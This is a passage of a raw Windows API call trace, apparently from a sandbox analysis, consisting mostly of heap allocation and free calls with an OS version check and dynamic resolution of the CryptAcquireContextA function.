HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0164.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.448] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.449] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.450] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.451] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.451] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.451] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.452] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.452] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0164.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.457] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0164.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.457] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.458] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 